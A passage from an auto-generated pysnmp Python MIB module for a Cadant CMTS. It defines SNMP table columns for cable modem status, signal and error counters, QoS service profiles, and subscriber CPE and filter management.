cadIfCmtsCmStatusDocsisVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 12), DocsisVersion().clone('docsis10')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDocsisVersion.setStatus('deprecated')
cadIfCmtsCmStatusRangFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusRangFlaps.setStatus('current')
cadIfCmtsCmStatusProvFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusProvFlaps.setStatus('current')
cadIfCmtsCmStatusRegFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusRegFlaps.setStatus('current')
cadIfCmtsCmStatusLastFlapTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 16), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastFlapTime.setStatus('current')
cadIfCmtsCmStatusInitRangTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 17), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInitRangTime.setStatus('current')
cadIfCmtsCmStatusPreFlapStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 18), CadIfCmtsCmStatusType().clone(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusPreFlapStatus.setStatus('current')
cadIfCmtsCmStatusConfigFilename = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 19), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusConfigFilename.setStatus('current')
cadIfCmtsCmStatusBpiVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("bpi", 0), ("bpiPlus", 1))).clone('bpi')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusBpiVersion.setStatus('current')
cadIfCmtsCmStatusModemType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 21), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("unknown", 0), ("standalone", 1), ("mta", 2), ("ccm", 3))).clone('unknown')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusModemType.setStatus('current')
cadIfCmtsCmStatusModulationType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 22), DocsisUpstreamType().clone('tdma')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusModulationType.setStatus('current')
cadIfCmtsCmStatusCmPtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 23), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusCmPtr.setStatus('current')
cadIfCmtsCmStatusTftpEnforceFailed = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 24), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusTftpEnforceFailed.setStatus('current')
cadIfCmtsCmStatusDynamicSecretFailed = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 25), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDynamicSecretFailed.setStatus('current')
cadIfCmtsCmStatusDocsCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 26), DocsisVersion().clone('docsis10')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDocsCapability.setStatus('current')
cadIfCmtsCmStatusDocsProvisioned = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 27), DocsisVersion().clone('docsis10')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDocsProvisioned.setStatus('current')
cadIfHVCmtsCmStatusLastFlapTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfHVCmtsCmStatusLastFlapTime.setStatus('current')
cadIfHVCmtsCmStatusInitRangTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfHVCmtsCmStatusInitRangTime.setStatus('current')
cadIf3CmtsCmRegStatusIPv6Addr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 30), InetAddressIPv6()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusIPv6Addr.setStatus('current')
cadIf3CmtsCmRegStatusIPv6LinkLocal = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 31), InetAddressIPv6()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusIPv6LinkLocal.setStatus('current')
cadIf3CmtsCmRegStatusMdIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 32), InterfaceIndexOrZero()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusMdIfIndex.setStatus('current')
cadIf3CmtsCmRegStatusMdCmSgId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 33), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusMdCmSgId.setStatus('current')
cadIf3CmtsCmRegStatusRcpId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 34), RcpId().clone(hexValue="0000000000")).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusRcpId.setStatus('current')
cadIf3CmtsCmRegStatusRccStatusId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 35), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusRccStatusId.setStatus('current')
cadIf3CmtsCmRegStatusRcsId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 36), ChSetId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusRcsId.setStatus('current')
cadIf3CmtsCmRegStatusTcsId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 37), ChSetId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusTcsId.setStatus('current')
cadIf3CmtsCmRegStatusLastRegTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 38), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusLastRegTime.setStatus('current')
cadIfCmtsCmStatusInetIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 39), InetAddressType().clone('ipv4')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInetIpAddrType.setStatus('current')
cadIfCmtsCmStatusInetIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 40), InetAddressIPv4or6().clone(hexValue="")).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInetIpAddress.setStatus('current')
cadIf3CmtsCmRegStatusServiceType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 41), DocsisQosVersion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusServiceType.setStatus('current')
cadIfCmtsCmStatusBpiEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 42), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusBpiEnabled.setStatus('current')
cadIfCmtsCmStatuseDocsisTypes = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 43), CadCpeDeviceTypes()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatuseDocsisTypes.setStatus('current')
cadIfCmtsCmStatusDsPenalties = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 44), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusDsPenalties.setStatus('current')
cadIfCmtsCmStatusUsPenalties = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 45), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusUsPenalties.setStatus('current')
cadIfCmtsCmStatusLastDsPenaltyStart = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 46), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastDsPenaltyStart.setStatus('current')
cadIfCmtsCmStatusLastDsPenaltyDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 47), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastDsPenaltyDuration.setStatus('current')
cadIfCmtsCmStatusLastUsPenaltyStart = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 48), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastUsPenaltyStart.setStatus('current')
cadIfCmtsCmStatusLastUsPenaltyDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 49), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusLastUsPenaltyDuration.setStatus('current')
cadIfCmtsCmStatusRxAcPowerLost = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 50), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusRxAcPowerLost.setStatus('current')
cadIfCmtsCmStatusInsertionFlaps = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 51), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmStatusInsertionFlaps.setStatus('current')
cadIf3CmtsCmRegStatusEnergyMgtCapability = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 52), Bits().clone(namedValues=NamedValues(("em1x1Mode", 0)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusEnergyMgtCapability.setStatus('current')
cadIf3CmtsCmRegStatusEnergyMgtEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 53), Bits().clone(namedValues=NamedValues(("em1x1Mode", 0)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusEnergyMgtEnabled.setStatus('current')
cadIf3CmtsCmRegStatusEnergyMgtOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 54), Bits().clone(namedValues=NamedValues(("em1x1Mode", 0)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmRegStatusEnergyMgtOperStatus.setStatus('current')
cadIf3CmtsCmStatsEm1x1ModeTotalDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 55), Unsigned32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmStatsEm1x1ModeTotalDuration.setStatus('current')
cadIf3CmtsCmStatsEm1x1ModeEntryTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 2, 1, 56), Unsigned32()).setUnits('seconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIf3CmtsCmStatsEm1x1ModeEntryTime.setStatus('current')
cadIfCmtsCmCountsTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3), )
if mibBuilder.loadTexts: cadIfCmtsCmCountsTable.setStatus('current')
cadIfCmtsCmCountsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmCountsUpChIfIndex"))
if mibBuilder.loadTexts: cadIfCmtsCmCountsEntry.setStatus('current')
cadIfCmtsCmCountsRxPower = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 1), TenthdBmV()).setUnits('dBmV').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsRxPower.setStatus('current')
cadIfCmtsCmCountsTimingOffset = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsTimingOffset.setStatus('current')
cadIfCmtsCmCountsEqualizationData = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsEqualizationData.setStatus('current')
cadIfCmtsCmCountsRangeReqOpportunities = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsRangeReqOpportunities.setStatus('current')
cadIfCmtsCmCountsRangeReqReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsRangeReqReceived.setStatus('current')
cadIfCmtsCmCountsPowerAdjExceedsThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsPowerAdjExceedsThreshold.setStatus('current')
cadIfCmtsCmCountsUpChIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 7), InterfaceIndex())
if mibBuilder.loadTexts: cadIfCmtsCmCountsUpChIfIndex.setStatus('current')
cadIfCmtsCmCountsSignalNoise = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 8), TenthdB()).setUnits('TenthdB').setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsSignalNoise.setStatus('current')
cadIfCmtsCmCountsUnerroreds = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsUnerroreds.setStatus('current')
cadIfCmtsCmCountsCorrecteds = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsCorrecteds.setStatus('current')
cadIfCmtsCmCountsUncorrectables = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsUncorrectables.setStatus('current')
cadIfCmtsCmCountsTxPower = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 3, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmCountsTxPower.setStatus('current')
cadIfCmtsServiceTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4), )
if mibBuilder.loadTexts: cadIfCmtsServiceTable.setStatus('current')
cadIfCmtsServiceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsServiceId"))
if mibBuilder.loadTexts: cadIfCmtsServiceEntry.setStatus('current')
cadIfCmtsServiceId = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceId.setStatus('current')
cadIfCmtsServiceMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 2), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceMacAddress.setStatus('current')
cadIfCmtsServiceAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2), ("destroyed", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceAdminStatus.setStatus('current')
cadIfCmtsServiceQosProfile = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceQosProfile.setStatus('current')
cadIfCmtsServiceCreateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 5), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsServiceCreateTime.setStatus('current')
cadIfQosProfPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfPriority.setStatus('current')
cadIfQosProfMaxUpBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfMaxUpBandwidth.setStatus('current')
cadIfQosProfGuarUpBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfGuarUpBandwidth.setStatus('current')
cadIfQosProfMaxDownBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 100000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfMaxDownBandwidth.setStatus('current')
cadIfQosProfMaxTxBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfMaxTxBurst.setStatus('current')
cadIfQosProfBaselinePrivacy = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 4, 1, 13), TruthValue().clone('false')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfQosProfBaselinePrivacy.setStatus('current')
cadIfCmtsPtrToMacTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5), )
if mibBuilder.loadTexts: cadIfCmtsPtrToMacTable.setStatus('current')
cadIfCmtsPtrToMacEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmPtr"))
if mibBuilder.loadTexts: cadIfCmtsPtrToMacEntry.setStatus('current')
cadIfCmtsCmPtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647)))
if mibBuilder.loadTexts: cadIfCmtsCmPtr.setStatus('current')
cadIfCmtsCmMac = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 5, 1, 2), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadIfCmtsCmMac.setStatus('current')
cadSubMgtCpeControlTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6), )
if mibBuilder.loadTexts: cadSubMgtCpeControlTable.setStatus('current')
cadSubMgtCpeControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1), )
cadIfCmtsCmStatusEntry.registerAugmentions(("CADANT-CMTS-MAC-MIB", "cadSubMgtCpeControlEntry"))
cadSubMgtCpeControlEntry.setIndexNames(*cadIfCmtsCmStatusEntry.getIndexNames())
if mibBuilder.loadTexts: cadSubMgtCpeControlEntry.setStatus('current')
cadSubMgtCpeControlMaxCpeIpv4 = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1023))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlMaxCpeIpv4.setStatus('current')
cadSubMgtCpeControlActive = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 2), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlActive.setStatus('current')
cadSubMgtCpeControlLearnable = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 3), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlLearnable.setStatus('current')
cadSubMgtCpeControlReset = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 4), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlReset.setStatus('current')
cadSubMgtCpeControlMaxCpeIpv6Addresses = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1023))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlMaxCpeIpv6Addresses.setStatus('current')
cadSubMgtCpeControlLastReset = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 6, 1, 6), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeControlLastReset.setStatus('current')
cadSubMgtCpeIpTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7), )
if mibBuilder.loadTexts: cadSubMgtCpeIpTable.setStatus('current')
cadSubMgtCpeIpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"), (0, "CADANT-CMTS-MAC-MIB", "cadSubMgtCpeIpIndex"))
if mibBuilder.loadTexts: cadSubMgtCpeIpEntry.setStatus('current')
cadSubMgtCpeIpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 1024)))
if mibBuilder.loadTexts: cadSubMgtCpeIpIndex.setStatus('current')
cadSubMgtCpeIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 2), InetAddressIPv4or6()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpAddr.setStatus('current')
cadSubMgtCpeIpLearned = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 3), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpLearned.setStatus('current')
cadSubMgtCpeIpMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 4), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpMacAddr.setStatus('current')
cadSubMgtCpeFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeFilterDownstream.setStatus('current')
cadSubMgtCpeFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeFilterUpstream.setStatus('current')
cadSubMgtCpeCpeType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("cpe", 1), ("ps", 2), ("mta", 3), ("stb", 4), ("tea", 5), ("erouter", 6))).clone('cpe')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeCpeType.setStatus('current')
cadSubMgtCpeIpAddrType = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 7, 1, 8), InetAddressType().clone('ipv4')).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCpeIpAddrType.setStatus('current')
cadSubMgtCmFilterTable = MibTable((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8), )
if mibBuilder.loadTexts: cadSubMgtCmFilterTable.setStatus('current')
cadSubMgtCmFilterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1), ).setIndexNames((0, "CADANT-CMTS-MAC-MIB", "cadIfCmtsCmStatusMacAddress"))
if mibBuilder.loadTexts: cadSubMgtCmFilterEntry.setStatus('current')
cadSubMgtSubFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtSubFilterDownstream.setStatus('current')
cadSubMgtSubFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtSubFilterUpstream.setStatus('current')
cadSubMgtCmFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCmFilterDownstream.setStatus('current')
cadSubMgtCmFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtCmFilterUpstream.setStatus('current')
cadSubMgtPsFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtPsFilterDownstream.setStatus('current')
cadSubMgtPsFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtPsFilterUpstream.setStatus('current')
cadSubMgtMtaFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtMtaFilterDownstream.setStatus('current')
cadSubMgtMtaFilterUpstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtMtaFilterUpstream.setStatus('current')
cadSubMgtStbFilterDownstream = MibTableColumn((1, 3, 6, 1, 4, 1, 4998, 1, 1, 20, 2, 8, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cadSubMgtStbFilterDownstream.setStatus('current')
